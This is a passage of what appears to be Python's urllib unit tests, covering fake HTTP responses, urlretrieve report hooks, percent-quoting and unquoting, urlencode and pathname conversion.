self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertTrue(isinstance(file_num, int),
"fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
        # Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertTrue(isinstance(self.returned_obj.info(), email.message.Message))
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
        # getproxies_environment() uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
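        # Monkey-patch http.client.HTTPConnection so urlopen() reads the canned
        # bytes from a fake socket instead of touching the network.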
class FakeSocket(io.BytesIO):
def sendall(self, str): pass
def makefile(self, *args, **kwds):
return self
def read(self, amt=None):
if self.closed: return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed: return b""
return io.BytesIO.readline(self, length)
class FakeHTTPConnection(http.client.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = FakeHTTPConnection
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
def test_read(self):
self.fakehttp(b"Hello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b'Hello!')
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(IOError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_userpass_inurl(self):
self.fakehttp(b"Hello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
        # this only helps to make sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.request.pathname2url(
os.path.abspath(filePath))
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertTrue(isinstance(result[1], email.message.Message),
"did not get a email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assertTrue(isinstance(count, int))
self.assertTrue(isinstance(block_size, int))
self.assertTrue(isinstance(total_size, int))
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
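
    A couple of illustrative calls (spaces are hex-escaped by quote() but become
    '+' under quote_plus(), and '/' is treated as safe by default only by quote()):
        >>> import urllib.parse
        >>> urllib.parse.quote('a b/c?d')
        'a%20b/c%3Fd'
        >>> urllib.parse.quote_plus('a b/c?d')
        'a+b%2Fc%3Fd'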
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
        do_not_quote = ''.join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
                                "abcdefghijklmnopqrstuvwxyz",
                                "0123456789",
                                "_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
        result = urllib.parse.quote_plus(partial_quote)
        self.assertEqual(expected, result,
                         "using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
        # Characters in Latin-1 range, encoded with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
    See the docstring for QuotingTests for details on quoting and such.
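
    For example (illustrative only):
        >>> import urllib.parse
        >>> urllib.parse.unquote('a%20b%2Fc')
        'a b/c'
        >>> urllib.parse.unquote_plus('a+b%2Fc')
        'a b/c'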
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
        # ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
        # ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
        result = urllib.parse.urlencode(given, doseq=True, safe=":$",
                                        encoding="latin-1")
        self.assertEqual(expect, result)
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
        # Test that automatic quoting and unquoting work for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.url2path function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
                             'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_splitpasswd(self):
"""Some of password examples are not sensible, but it is added to
confirming to RFC2617 and addressing issue4675.
"""
self.assertEqual(('user', 'ab'),urllib.parse.splitpasswd('user:ab'))
self.assertEqual(('user', 'a\nb'),urllib.parse.splitpasswd('user:a\nb'))
